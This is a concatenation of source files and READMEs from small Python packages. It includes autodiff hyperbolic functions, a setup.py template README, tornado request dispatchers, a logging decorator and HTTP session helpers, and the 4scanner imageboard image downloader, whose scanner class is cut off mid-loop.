        # vb is unused: cosh is unary.
        return np.cosh(va)
    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        """ derivative of cosh(x) = sinh(x)"""
        return np.sinh(va)
class VarTanH(Ops):
    """
    A class for trigonometric hyperbolic tangent operation. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> tanh(Var(1, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 0.7615941559557649, der: {'x': array([[[[0.41997434]]]])})
    """
    @classmethod
    def op(cls, va, vb):
        # vb is unused: tanh is unary.
        return np.tanh(va)
    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        """ derivative of tanh(x) = 1 - tanh(x)^2 """
        return 1 - np.tanh(va) ** 2
class VarArcSinH(Ops):
    """
    A class for trigonometric hyperbolic arcsine operation. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> arcsinh(Var(0, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
    """
    @classmethod
    def op(cls, va, vb):
        # vb is unused: arcsinh is unary.
        return np.arcsinh(va)
    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        """ derivative of arcsinh(x) = 1 / sqrt(x^2 + 1), defined for all real va.

        Fix: accept **kwargs like every other local_derivative in this module,
        so callers passing extra keyword arguments do not fail here.
        """
        return 1 / np.sqrt((va ** 2) + 1)
class VarArcCosH(Ops):
    """
    A class for trigonometric hyperbolic arccosine operation. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> arccosh(Var(2, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 1.3169578969248166, der: {'x': array([[[[0.57735027]]]])})
    """
    @classmethod
    def op(cls, va, vb):
        # vb is unused: arccosh is unary.
        return np.arccosh(va)
    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        """ derivative of arccosh(x) = 1 / sqrt(x^2 - 1), defined for real va > 1 """
        # Fix: np.all makes the domain check valid for matrix inputs too; a bare
        # `assert va > 1` raises "truth value is ambiguous" on multi-element arrays.
        assert np.all(va > 1), "va should be greater than 1."
        return 1 / np.sqrt((va ** 2) - 1)
class VarArcTanH(Ops):
    """
    A class for trigonometric hyperbolic arctan operation. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> arctanh(Var(0, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
    """
    @classmethod
    def op(cls, va, vb):
        """ the domain of arctanh is (-1, 1) """
        # Fix: np.all makes the domain check valid for matrix inputs too; a bare
        # `assert np.abs(va) < 1` is ambiguous on multi-element arrays.
        assert np.all(np.abs(va) < 1), "The value inside arctanh should be between (-1, 1)."
        return np.arctanh(va)
    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        """ derivative of arctanh(x) = 1 / (1-x^2) """
        return 1 / (1 - va ** 2)
# Bind each operation both as a module-level function (sin(x)) and as a Var
# method (x.sin()) via _dunder_wrapper.
sin = VarSin.unary_operation  # enable sin(x)
Var.sin = _dunder_wrapper(sin, True)  # enable x.sin()
arcsin = VarArcSin.unary_operation
Var.arcsin = _dunder_wrapper(arcsin, True)
cos = VarCos.unary_operation
Var.cos = _dunder_wrapper(cos, True)
arccos = VarArcCos.unary_operation
Var.arccos = _dunder_wrapper(arccos, True)
tan = VarTan.unary_operation
Var.tan = _dunder_wrapper(tan, True)
arctan = VarArcTan.unary_operation
Var.arctan = _dunder_wrapper(arctan, True)
sinh = VarSinH.unary_operation
Var.sinh = _dunder_wrapper(sinh, True)
arcsinh = VarArcSinH.unary_operation
Var.arcsinh = _dunder_wrapper(arcsinh, True)
cosh = VarCosH.unary_operation
Var.cosh = _dunder_wrapper(cosh, True)
arccosh = VarArcCosH.unary_operation
Var.arccosh = _dunder_wrapper(arccosh, True)
tanh = VarTanH.unary_operation
Var.tanh = _dunder_wrapper(tanh, True)
arctanh = VarArcTanH.unary_operation
Var.arctanh = _dunder_wrapper(arctanh, True)
📦 setup.py (for humans)
=======================
This repo exists to provide [an example setup.py] file, that can be used
to bootstrap your next Python project. It includes some advanced
patterns and best practices for `setup.py`, as well as some
commented–out nice–to–haves.
For example, this `setup.py` provides a `$ python setup.py upload`
command, which creates a *universal wheel* (and *sdist*) and uploads
your package to [PyPi] using [Twine], without the need for an annoying
`setup.cfg` file. It also creates/uploads a new git tag, automatically.
In short, `setup.py` files can be daunting to approach, when first
starting out — even Guido has been heard saying, "everyone cargo cults
thems". It's true — so, I want this repo to be the best place to
copy–paste from :)
[Check out the example!][an example setup.py]
Installation
-----
```bash
cd your_project
# Download the setup.py file:
# download with wget
wget https://raw.githubusercontent.com/navdeep-G/setup.py/master/setup.py -O setup.py
# download with curl
curl -O https://raw.githubusercontent.com/navdeep-G/setup.py/master/setup.py
```
To Do
-----
- Tests via `$ setup.py test` (if it's concise).
Pull requests are encouraged!
More Resources
--------------
- [What is setup.py?] on Stack Overflow
- [Official Python Packaging User Guide](https://packaging.python.org)
- [The Hitchhiker's Guide to Packaging]
- [Cookiecutter template for a Python package]
License
-------
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any means.
[an example setup.py]: https://github.com/navdeep-G/setup.py/blob/master/setup.py
[PyPi]: https://docs.python.org/3/distutils/packageindex.html
[Twine]: https://pypi.python.org/pypi/twine
[image]: https://farm1.staticflickr.com/628/33173824932_58add34581_k_d.jpg
[What is setup.py?]: https://stackoverflow.com/questions/1471994/what-is-setup-py
[The Hitchhiker's Guide to Packaging]: https://the-hitchhikers-guide-to-packaging.readthedocs.io/en/latest/creation.html
[Cookiecutter template for a Python package]: https://github.com/audreyr/cookiecutter-pypackage
| 4in | /4in-0.1.0.tar.gz/4in-0.1.0/README.md | README.md |
import requests
def call_csv_endpoint(
    # (sic) parameter name kept as-is for backward compatibility with keyword callers
    endopint_url: str,
    csv_input_file_name: str,
    call_timeout: int = 15,
):
    """Send a CSV file to a microservice HTTP endpoint and summarize the JSON result.

    Args:
        endopint_url: URL of the microservice endpoint (POST, multipart upload).
        csv_input_file_name: path of the CSV file to upload.
        call_timeout: request timeout in seconds.

    Returns:
        dict with:
            business_exceptions_quantity (int): number of business exceptions,
            business_exceptions_data (list[dict]): one {"exception_comment": ...} per exception,
            data_sets_names (list[str]): names of the additional result data sets.

    Raises:
        requests.HTTPError: if the endpoint returns an error status.
        OSError: if the CSV file cannot be opened.
    """
    with open(csv_input_file_name, encoding="utf-8") as csv_file:
        files = {"file": ("input_data.csv", csv_file, "text/csv")}
        response_from_api = requests.post(
            endopint_url, timeout=call_timeout, files=files
        )
    # raise error if there was a problem calling the endpoint
    response_from_api.raise_for_status()
    result = response_from_api.json()
    # summarize business exceptions
    b_exceptions = result["data_collection"]["businessExceptions"]
    b_exceptions_data = [
        {"exception_comment": b_excep["exceptionComment"]} for b_excep in b_exceptions
    ]
    # collect the names of the additional data sets
    data_sets_names = [
        d_set["inputFormatName"]
        for d_set in result["data_collection"]["resultAdditionalData"]
    ]
    return {
        "business_exceptions_quantity": len(b_exceptions),
        "business_exceptions_data": b_exceptions_data,
        "data_sets_names": data_sets_names,
    }
def call_csv_endpoint_read_data_set(
    # (sic) parameter name kept as-is for backward compatibility with keyword callers
    endopint_url: str,
    csv_input_file_name: str,
    data_set_name_to_return: str,
    call_timeout: int = 15,
):
    """Send a CSV file to a microservice HTTP endpoint and return one named data set.

    Args:
        endopint_url: URL of the microservice endpoint (POST, multipart upload).
        csv_input_file_name: path of the CSV file to upload.
        data_set_name_to_return: name of the additional data set to extract.
        call_timeout: request timeout in seconds.

    Returns:
        The first value of the matching data set's "inputObject" mapping,
        or {} if no data set with that name (and a non-empty inputObject) exists.

    Raises:
        requests.HTTPError: if the endpoint returns an error status.
        OSError: if the CSV file cannot be opened.
    """
    with open(csv_input_file_name, encoding="utf-8") as csv_file:
        files = {"file": ("input_data.csv", csv_file, "text/csv")}
        response_from_api = requests.post(
            endopint_url, timeout=call_timeout, files=files
        )
    # raise error if there was a problem calling the endpoint
    response_from_api.raise_for_status()
    result = response_from_api.json()
    for d_set in result["data_collection"]["resultAdditionalData"]:
        if d_set["inputFormatName"] == data_set_name_to_return:
            # return the first value of the inputObject mapping (its single
            # key is unspecified); keep scanning if the mapping is empty
            for rows in d_set["inputObject"].values():
                return rows
    # the requested data set name was not found
    return {}
import json
import os
import inspect
from tornado.ioloop import IOLoop
from tornado.web import RequestHandler, Application
from tornado.websocket import WebSocketHandler
from _4helper import _4ssert
class WebServer:
    """Small tornado-based web server with prefix-routed request handlers."""
    @classmethod
    def parse_ip_port(cls, ip_port):
        """Split "ip:port" (or a bare port int/str) into an (ip, port) tuple;
        a bare port is bound to 127.0.0.1."""
        if isinstance(ip_port, int) or ":" not in ip_port:
            return "127.0.0.1", int(ip_port)
        else:
            ip, port = ip_port.split(":")
            return ip, int(port)
    @classmethod
    def start(cls, config):
        """Start the server and block forever on the tornado IO loop.

        config keys: "ip" (default 127.0.0.1), "port" (default "80"),
        "routes" (dict path-prefix -> handler object; defaults to {"/": cls}).
        """
        ip = config.get("ip", "127.0.0.1")
        port = int(config.get("port", "80"))
        routes = config.get("routes", {"/": cls})
        class _WebSocketHandler(WebSocketHandler):
            # Minimal websocket: logs events and echoes messages back.
            # NOTE(review): tornado invokes on_close synchronously; an async def
            # here produces an un-awaited coroutine — confirm this is intended.
            async def open(self, *args, **kwargs):
                print(f"open {args} {kwargs}")
            async def on_close(self):
                print("close")
            async def on_message(self, message):
                print(f"handling {message}")
                self.write_message(f"got {message}")
        class _Handler(RequestHandler):
            SUPPORTED_METHODS = ["GET", "POST"]
            async def get(self):
                await self.handle()
            async def post(self):
                await self.handle(True)
            async def handle(self, is_post=False):
                # NOTE(review): is_post is never read below — GET and POST are
                # dispatched identically.
                # Longest-prefix match of the request path against the routes.
                match_handler = None
                max_match_length = 0
                for path, handler in routes.items():
                    if self.request.path.startswith(path):
                        match_length = len(path)
                        if match_length > max_match_length:
                            max_match_length = match_length
                            match_handler = handler
                if match_handler is None:
                    self.set_status(404)
                    self.finish()
                    return
                # The remainder of the path selects a handle_<suffix> method.
                func_name = "handle_%s" % self.request.path[max_match_length:]
                func = getattr(match_handler, func_name, None)
                if func is None:
                    self.set_status(404)
                    self.finish()
                    return
                # Build kwargs from query/form arguments, or from a JSON body.
                if self.request.arguments:
                    request = dict(
                        (i, j[0].decode()) for i, j in self.request.arguments.items()
                    )
                else:
                    request = json.loads(self.request.body or "{}")
                    request = dict((i, str(j)) for i, j in request.items())
                func_parameters = inspect.signature(func).parameters
                # "headers"/"body" are reserved names: reject them as client
                # arguments, inject them only if the handler declares them.
                for key, value in (
                    ("headers", self.request.headers),
                    ("body", self.request.body),
                ):
                    _4ssert(key not in request)
                    if key in func_parameters:
                        request[key] = value
                response = await func(**request)
                # dict responses are serialized as JSON; others written as-is
                if isinstance(response, dict):
                    self.write(json.dumps(response))
                else:
                    self.write(response)
                self.finish()
        Application(
            [(r"/websocket", _WebSocketHandler), (r".*", _Handler,)],
            static_path=os.path.join(os.getcwd(), "static"),
        ).listen(port, address=ip)
        IOLoop.current().start()
import json
import os
import inspect
from tornado.ioloop import IOLoop
from tornado.web import RequestHandler, Application
from tornado.websocket import WebSocketHandler
from _4helper import _4ssert
class _WebSocketHandler(WebSocketHandler):
    """Minimal websocket handler: logs connection events and echoes messages.

    NOTE(review): tornado invokes on_close synchronously; an async def here
    produces an un-awaited coroutine — confirm this is intended.
    """
    async def open(self, *args, **kwargs):
        print(f"open {args} {kwargs}")
    async def on_close(self):
        print("close")
    async def on_message(self, message):
        print(f"handling {message}")
        self.write_message(f"got {message}")
class _Handler(RequestHandler):
    """Catch-all HTTP handler that dispatches by longest path-prefix match.

    The matched route object must expose a ``handle_<suffix>`` coroutine for
    the remainder of the request path; its return value is written back
    (dicts are serialized as JSON).
    """
    SUPPORTED_METHODS = ["GET", "POST"]
    def initialize(self, routes):
        # routes: dict mapping path prefix -> handler object
        self.routes = routes #pylint: disable=attribute-defined-outside-init
    async def get(self):
        await self.handle()
    async def post(self):
        await self.handle()
    async def handle(self):
        # Longest-prefix match of the request path against the routes.
        match_handler = None
        max_match_length = 0
        for path, handler in self.routes.items():
            if self.request.path.startswith(path):
                match_length = len(path)
                if match_length > max_match_length:
                    max_match_length = match_length
                    match_handler = handler
        if match_handler is None:
            self.set_status(404)
            self.finish()
            return
        # The remainder of the path selects a handle_<suffix> method.
        func_name = "handle_%s" % self.request.path[max_match_length:]
        func = getattr(match_handler, func_name, None)
        if func is None:
            self.set_status(404)
            self.finish()
            return
        # Build kwargs from query/form arguments, or from a JSON body.
        if self.request.arguments:
            request = dict(
                (i, j[0].decode()) for i, j in self.request.arguments.items()
            )
        else:
            request = json.loads(self.request.body or "{}")
            request = dict((i, str(j)) for i, j in request.items())
        func_parameters = inspect.signature(func).parameters
        # "headers"/"body" are reserved names: reject them as client arguments,
        # inject them only if the handler function declares them.
        for key, value in (
            ("headers", self.request.headers),
            ("body", self.request.body),
        ):
            _4ssert(key not in request)
            if key in func_parameters:
                request[key] = value
        response = await func(**request)
        # dict responses are serialized as JSON; others written as-is
        if isinstance(response, dict):
            self.write(json.dumps(response))
        else:
            self.write(response)
        self.finish()
def start(settings):
    """Configure the tornado Application from *settings* and run the IO loop forever.

    Note: this consumes (pops) the "ip", "port" and "routes" keys from the
    *settings* dict passed in by the caller.
    """
    host = settings.pop("ip", "127.0.0.1")
    port = int(settings.pop("port"))
    routes = settings.pop("routes", {})
    handlers = [
        (r"/websocket", _WebSocketHandler),
        (r".*", _Handler, {"routes": routes}),
    ]
    app = Application(handlers, static_path=os.path.join(os.getcwd(), "static"))
    app.listen(port, address=host)
    IOLoop.current().start()
import time
import json
from functools import wraps
from random import randint
from .common import logger, format_stacks
def tracer(fn):
    """Decorator that logs each call's input, output (pretty-printed JSON when
    possible), duration, and traceback on failure, under a random trace id.

    Calls that look like Django view handlers (args[1] has .method/.path and
    args[2] has .dict) get request/response-oriented formatting.
    """
    @wraps(fn)
    def wrapper(*args, **kwargs):
        # random id correlates the "input" and "output" log records of one call
        log_id = randint(0, 100000)
        start_time = time.time()
        def _time():
            # elapsed wall-clock time since the call started, in milliseconds
            # return '%0.4f' % (time.time() - start_time)
            return "%sms" % int((time.time() - start_time) * 1000)
        def _log(lines):
            # frame the given lines between trace_<id> banners
            lines = (
                ["", "<<< trace_%s <<<<<<<<<<<" % log_id]
                + [" %s" % line for line in lines]
                + [">>> trace_%s >>>>>>>>>>>" % log_id, ""]
            )
            logger.info("\n".join(lines))
        def _json(result, header=" " * 4):
            # pretty-print dicts (or JSON-parseable strings); fall back to raw
            if isinstance(result, dict):
                return "\n".join(
                    "%s%s" % (header, i)
                    for i in json.dumps(result, indent=4).splitlines()
                )
            else:
                try:
                    assert isinstance(result, str)
                    return "\n".join(
                        "%s%s" % (header, i)
                        for i in json.dumps(json.loads(result), indent=4).splitlines()
                    )
                except Exception:
                    return result
        # Heuristic: (self, request, params, ...) signature of a Django handler
        if (
            len(args) >= 3
            and hasattr(args[1], "method")
            and hasattr(args[1], "path")
            and hasattr(args[2], "dict")
        ):
            mode = "DJANGO_HANDLER"
        else:
            mode = ""
        def _log_input():
            if mode == "DJANGO_HANDLER":
                return "%s:%s %s" % (args[1].method, args[1].path, args[2].dict())
            else:
                return "<----< %s %s" % (
                    " ".join(str(i) for i in args),
                    " ".join("%s:%s" % (k, v) for k, v in kwargs.items()),
                )
        def _log_output():
            if mode == "DJANGO_HANDLER":
                # elapsed time, HTTP status, then the decoded response body
                return "%s %s -> %s" % (
                    _time(),
                    result.status_code,
                    _json(result.content.decode("utf-8")),
                )
            else:
                return ">----> %s" % _json(result)
        _log([_log_input()])
        try:
            result = fn(*args, **kwargs)
        except Exception:
            # log the input again together with the stack trace, then re-raise
            _log([_log_input(),] + list(format_stacks()))
            raise
        else:
            _log(
                [_log_input(), _log_output(),]
            )
        return result
    return wrapper
import contextlib
import requests
import json
from .common import logger
class Session:
    """Thin wrapper over requests.Session pinned to one base domain, with
    default cookies/headers and request/response logging."""
    def __init__(self, domain, cookies=None, headers=None):
        self._session = requests.session()
        self.domain = domain
        self.cookies = cookies or {}
        self.headers = headers or {}
        # default to a desktop-browser User-Agent unless the caller set one
        if "User-Agent" not in self.headers:
            self.headers["User-Agent"] = (
                "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,"
                " like Gecko) Ubuntu Chromium/69.0.3497.81 Chrome/69.0.3497.81 Safari/537.36"
            )
    def close(self):
        """Release the underlying requests session."""
        self._session.close()
    def _request(self, method, path, params=None, data=None, headers=None):
        """Issue one HTTP request against domain+path and return the parsed body.

        The body is always sent JSON-encoded (even an empty "{}" for
        GET/HEAD). Session-level headers override per-call headers with the
        same name (headers.update(self.headers) below).
        """
        params = params or {}
        data = data or {}
        headers = headers or {}
        logger.info(
            "%s ing %s" % (method, self.domain + path,)
            + (" params %s" % params if params else "")
            + (" data %s" % data if data else "")
            + (" headers %s" % headers if headers else "")
        )
        headers.update(self.headers)
        response = self._session.request(
            method,
            self.domain + path,
            data=json.dumps(data),
            params=params,
            cookies=self.cookies,
            headers=headers,
        )
        # prefer JSON; fall back to the raw text when the body doesn't parse
        try:
            response_json = response.json()
            logger.info("responding json:\n%s" % json.dumps(response_json, indent=4))
            return response_json
        except Exception:
            logger.info("responding text:\n%s" % ("".join(response.text.splitlines())))
            return response.text
    def get(self, path, params=None, headers=None):
        """GET domain+path; returns parsed JSON or raw text."""
        return self._request("GET", path, params=params, headers=headers)
    def post(self, path, data=None, headers=None):
        """POST a JSON-encoded body to domain+path; returns parsed JSON or raw text."""
        return self._request("POST", path, data=data, headers=headers)
    def head(self, path, params=None, headers=None):
        """HEAD domain+path; returns parsed JSON or raw text."""
        return self._request("HEAD", path, params=params, headers=headers)
@contextlib.contextmanager
def session(domain, cookies=None, headers=None):
    """Context manager yielding a Session that is always closed on exit.

    Fix: close the underlying requests session even when the with-body
    raises — the previous version skipped close() on exceptions because the
    yield was not wrapped in try/finally.
    """
    _session = Session(domain, cookies=cookies, headers=headers)
    try:
        yield _session
    finally:
        _session.close()
from tornado.web import RequestHandler, Application
from tornado.websocket import WebSocketHandler
import json
import os
import inspect
from . import loop
def parse_ip_port(ip_port):
    """Split an "ip:port" string into an (ip, port) tuple.

    A bare port — an int, or a string without a colon — is bound to
    localhost ("127.0.0.1"). The port is always returned as an int.
    """
    if not isinstance(ip_port, int) and ":" in ip_port:
        host, port_text = ip_port.split(":")
        return host, int(port_text)
    return "127.0.0.1", int(ip_port)
def http(ip_port, handlers=None):
    """Start a tornado HTTP server on *ip_port* and block on the IO loop.

    Args:
        ip_port: "ip:port" string or bare port (see parse_ip_port).
        handlers: dict mapping path prefix -> handler object; the matched
            object must expose a ``handle_<path-suffix>`` coroutine.
    """
    class _WebSocketHandler(WebSocketHandler):
        # Minimal websocket: logs events and echoes messages back.
        # NOTE(review): tornado invokes on_close synchronously; an async def
        # here produces an un-awaited coroutine — confirm this is intended.
        async def open(self, *args, **kwargs):
            print(f"open {args} {kwargs}")
        async def on_close(self):
            print("close")
        async def on_message(self, message):
            print(f"handling {message}")
            self.write_message(f"got {message}")
    class _Handler(RequestHandler):
        SUPPORTED_METHODS = ["GET", "POST"]
        async def get(self):
            await self.handle()
        async def post(self):
            await self.handle(True)
        async def handle(self, is_post=False):
            # NOTE(review): is_post is never read below — GET and POST are
            # dispatched identically.
            # Longest-prefix match of the request path against the handlers.
            match_handler = None
            max_match_length = 0
            for path, handler in handlers.items():
                if self.request.path.startswith(path):
                    match_length = len(path)
                    if match_length > max_match_length:
                        max_match_length = match_length
                        match_handler = handler
            if match_handler is None:
                self.set_status(404)
                self.finish()
                return
            # The remainder of the path selects a handle_<suffix> method.
            func_name = "handle_%s" % self.request.path[max_match_length:]
            func = getattr(match_handler, func_name, None)
            if func is None:
                self.set_status(404)
                self.finish()
                return
            # Build kwargs from query/form arguments, or from a JSON body.
            if self.request.arguments:
                request = dict(
                    (i, j[0].decode()) for i, j in self.request.arguments.items()
                )
            else:
                request = json.loads(self.request.body or "{}")
                request = dict((i, str(j)) for i, j in request.items())
            # Inject the raw request headers only if the handler declares them.
            if "headers" in inspect.signature(func).parameters:
                response = await func(**request, headers=self.request.headers)
            else:
                response = await func(**request)
            # dict responses are serialized as JSON; others written as-is
            if isinstance(response, dict):
                self.write(json.dumps(response))
            else:
                self.write(response)
            self.finish()
    ip, port = parse_ip_port(ip_port)
    Application(
        [(r"/websocket", _WebSocketHandler), (r".*", _Handler,)],
        static_path=os.path.join(os.getcwd(), "static"),
    ).listen(port, address=ip)
    loop.start()
# 4scanner [![Build Status](https://travis-ci.org/pboardman/4scanner.svg?branch=master)](https://travis-ci.org/pboardman/4scanner)
![4scanner logo](logo/4scanner128.png)
4scanner can search multiple imageboards threads for matching keywords then download all images to disk.
## Supported imageboards
- 4chan
- lainchan
- uboachan
You can create an issue if you want to see other imageboards supported
## Installing
` pip3 install 4scanner `
(4scanner is ONLY compatible with python3+)
For Arch Linux there is an [AUR package](https://aur.archlinux.org/packages/4scanner/)
## Running via Docker
Create a config (detail below), name it config.json and drop it where you would like to download the images. Then run a container:
`docker run -v /can/be/anywhere:/output -v /anywhere/else:/root/.4scanner lacsap/4scanner`
`/can/be/anywhere` Can be anywhere on your computer, images will be downloaded there (This is the directory where you need to put the config.json)
`/anywhere/else` Can be anywhere on your computer, it will contain the sqlite3 database 4scanner uses to keep track of downloaded threads and duplicates
## How to
the first thing you need to do is create a simple json file with the directories names
you want, the boards you want to search and the keywords.
(see the json file section for more details)
After your json file is done you can start 4scanner with:
` 4scanner file.json `
it will search all threads for the keywords defined in your json file and
download all images/webms from threads where a keyword is found. (In the current directory unless you specify one with -o )
## Creating your JSON file via the 4genconf script (easy)
The `4genconf` utility is now installed as of 4scanner 1.5.1. This utility will ask you simple questions about what you want to download and generate a configuration file for you!
## Creating your JSON file manually
Creating the JSON file is easy, you can use the example.json file as a base.
Your "Searches" are what 4scanner use to know which board to check for what keywords and the name of the folder where it needs to download the images, you can have as many "Searches" as you want.
Here is an example of what the JSON file should look like:
```json
{"searches":[
{
"imageboard": "IMAGEBOARD",
"folder_name": "YOUR_FOLDER_NAME",
"board": "BOARD_LETTER",
"keywords": ["KEYWORD1", "KEYWORD2"]
},
{
"imageboard": "4chan",
"folder_name": "vidya",
"board": "v",
"keywords": ["tf2", "splatoon", "world of tank"]
}
]}
```
## Search options
4scanner has a lot of options for downloading only the images you want. Such as downloading only images with a certain width or height, or only images with a certain extension.
To see all available options with examples check out: [OPTIONS.md](OPTIONS.md)
[Hydrus Network](https://hydrusnetwork.github.io/hydrus/) users: check out the `tag` [option](OPTIONS.md) to automatically tag your images on import
- Example with all optional options
```json
{"searches":[
{
"imageboard": "4chan",
"folder_name": "vidya",
"board": "v",
"width": ">1000",
"height": ">1000",
"filename": "IMG_",
"extension": [".jpg", ".png"],
"tag": ["game"],
"keywords": ["tf2", "splatoon", "world of tank"],
"check_duplicate": true,
"subject_only": false
}
]}
```
This will download images bigger than 1000x1000 which are .jpg or .png with a filename containing ``` IMG_ ```
## Notes
- the keywords search is case insensitive
## 4downloader
4downloader is also installed with 4scanner and can be used to download
a single thread like this:

``` 4downloader http://boards.4chan.org/b/thread/373687492 ```

It will download all images until the thread dies.
You can also download threads from imageboards other than 4chan with ```-i```
| 4scanner | /4scanner-1.6.3.tar.gz/4scanner-1.6.3/README.md | README.md |
import time
import json
import os
import re
from scanner import downloader, imageboard_info
from scanner.config import DB_FILE, currently_downloading
import sqlite3
import subprocess
import urllib.request
import threading
import http.client
class thread_scanner:
    def __init__(self, keywords_file:str, output:str, quota_mb:int, wait_time:int, logger):
        """
        Using the keyword file passed as a parameter to 4scanner,
        thread_scanner will search multiple threads and imageboards
        and launch the download of a thread if a keyword is found in first post of the thread.

        Use scan() to start the scan.

        Args:
            keywords_file: path of file describing what imageboards/boards/keywords to search, as JSON (see README)
            output: The output directory where the pictures will be downloaded
            quota_mb: stop 4scanner after quota_mb MB have been downloaded
            wait_time: number of seconds to wait between scans
            logger: logger instance used for all output
        """
        self.keywords_file = keywords_file
        self.output = output
        self.quota_mb = quota_mb
        self.wait_time = wait_time
        self.logger = logger

    def get_catalog_json(self, board:str, chan:str):
        """
        Get the catalog of a given imageboard's board as a JSON

        Returns:
            catalog info as a dict
        """
        chan_base_url = imageboard_info.imageboard_info(chan).base_url
        catalog = urllib.request.urlopen(
            "{0}{1}/catalog.json".format(chan_base_url, board))
        try:
            catalog_data = catalog.read()
        except http.client.IncompleteRead as err:
            # Keep whatever was received; it is usually still parseable.
            catalog_data = err.partial
        return json.loads(catalog_data.decode("utf8"))

    def scan_thread(self, keyword:str, catalog_json:str, subject_only:str, wildcard:str):
        """
        Check each thread; threads which contain the keyword are returned

        Args:
            keyword: A keyword to search for. Example: "moot"
            catalog_json: A dict of a board catalog, as returned by get_catalog_json()
            subject_only: Search only within the subject of the thread, as opposed to searching the subject and first post
            wildcard: "all" (substring match), "start" (word-prefix match) or anything else (whole-word match)

        Returns:
            a list of thread numbers that matched the keyword
        """
        # Build the regex once; only the anchoring differs per wildcard mode.
        if wildcard == "all":
            regex = r'{0}'.format(keyword)
        elif wildcard == "start":
            regex = r'\b{0}'.format(keyword)
        else:
            regex = r'\b{0}\b'.format(keyword)

        matched_threads = []
        for page in catalog_json:
            for thread in page["threads"]:
                # Search thread subject
                if 'sub' in thread:
                    if re.search(regex, str(thread["sub"]), re.IGNORECASE):
                        matched_threads.append(thread["no"])
                if not subject_only:
                    # Search OPs post body
                    if 'com' in thread:
                        if re.search(regex, str(thread["com"]), re.IGNORECASE):
                            matched_threads.append(thread["no"])
        return matched_threads

    def download_thread(self, thread_id:int, chan:str, board:str, folder:str, output:str, condition:dict, dupe_check:bool, tag_list:list, throttle:int):
        """
        Create a downloader object with the info passed as parameter and start the download in a new thread.
        """
        thread_downloader = downloader.downloader(thread_id, board, chan, output, folder, True, condition, dupe_check, tag_list, throttle, self.logger)
        t = threading.Thread(target=thread_downloader.download)
        t.daemon = True
        t.start()

    def dir_size_mb(self, directory):
        """
        Check the size of a directory in MB.

        Args:
            directory: the path to a directory

        Returns:
            Size of the directory in MB
        """
        total_size = 0
        for dirpath, dirnames, filenames in os.walk(directory):
            for f in filenames:
                fp = os.path.join(dirpath, f)
                total_size += os.path.getsize(fp)
        return total_size / 1000000

    def check_quota(self):
        """
        Stop 4scanner if the download quota was reached.
        """
        # Bug fix: dir_size_mb is a method; the original called it as a bare
        # name, which raised NameError whenever a quota was configured.
        if int(self.quota_mb) < self.dir_size_mb(os.path.join(self.output, "downloads")):
            self.logger.info("Quota limit exceeded. Stopping 4scanner.")
            exit(0)

    def get_check_duplicate(self, search):
        """
        Check whether to activate the check duplicate feature

        Returns:
            True if we need to activate it, False otherwise (on by default)
        """
        if 'check_duplicate' in search:
            return bool(search['check_duplicate'])
        # duplicate check is on by default
        return True

    def get_condition(self, search:dict):
        """
        Get all search conditions from a search

        Returns:
            All search conditions as a dict with keys ext/filename/width/height;
            unspecified conditions are set to False.
        """
        condition = {}
        if 'extension' in search:
            if isinstance(search['extension'], str):
                condition["ext"] = [search['extension']]
            else:
                condition["ext"] = list(search['extension'])
        else:
            condition["ext"] = False

        if 'filename' in search:
            if isinstance(search['filename'], str):
                condition["filename"] = [search['filename']]
            else:
                condition["filename"] = list(search['filename'])
        else:
            condition["filename"] = False

        condition["width"] = search.get('width', False)
        condition["height"] = search.get('height', False)
        return condition

    def get_imageboard(self, search:dict):
        """
        Get the imageboard from a search

        Returns:
            the imageboard name; raises via imageboard_info if unsupported
        """
        if 'imageboard' in search:
            chan = search["imageboard"]
            # will raise error if not supported
            imageboard_info.imageboard_info(chan)
        else:
            # default
            chan = "4chan"
        return chan

    def get_tag_list(self, search):
        """
        Get all tags from a search

        Returns:
            a list containing all tags or None
        """
        return search["tag"] if 'tag' in search else None

    def get_subject_only(self, search):
        """
        Check whether to search only the subject of posts for a given search.

        Returns:
            Truthy to search subject only, None when unspecified
        """
        return search["subject_only"] if 'subject_only' in search else None

    def get_wildcard(self, search):
        """
        Get the wildcard matching mode ("all", "start" or None) for a given search.

        Returns:
            the wildcard mode, or None when unspecified (whole-word matching)
        """
        return search["wildcard"] if 'wildcard' in search else None

    def get_keyword(self, search):
        """
        Get a list of all keywords to use in a search.

        Returns:
            list of all keywords to search for; exits if none are defined
        """
        if 'keywords' not in search:
            self.logger.critical("Cannot scan without any keyword...")
            exit(1)
        if isinstance(search['keywords'], str):
            return [search['keywords']]
        return list(search['keywords'])

    def scan(self):
        """
        Start the scanning/download process. Loops forever, sleeping
        wait_time seconds between passes over the configured searches.
        """
        while True:
            if self.quota_mb:
                self.check_quota()

            self.logger.info("Searching threads...")

            try:
                json_file = json.load(open(self.keywords_file))
            except ValueError:
                self.logger.critical("Your JSON file is malformed. Quitting.")
                exit(1)

            for search in json_file["searches"]:
                # Getting imageboard to search
                chan = self.get_imageboard(search)
                # Checking conditions
                condition = self.get_condition(search)
                # Check if we need to check for duplicate when downloading
                dupe_check = self.get_check_duplicate(search)
                # Getting output folder name
                folder_name = search["folder_name"]
                # Get tag list (if any)
                tag_list = self.get_tag_list(search)
                # Get throttle
                throttle = int(search['throttle']) if 'throttle' in search else 2
                # if this is true we will search only the subject field
                subject_only = self.get_subject_only(search)
                wildcard = self.get_wildcard(search)
                board = search["board"]
                keywords = self.get_keyword(search)

                try:
                    catalog_json = self.get_catalog_json(board, chan)

                    for keyword in keywords:
                        threads_id = self.scan_thread(keyword, catalog_json, subject_only, wildcard)

                        for thread_id in list(set(threads_id)):
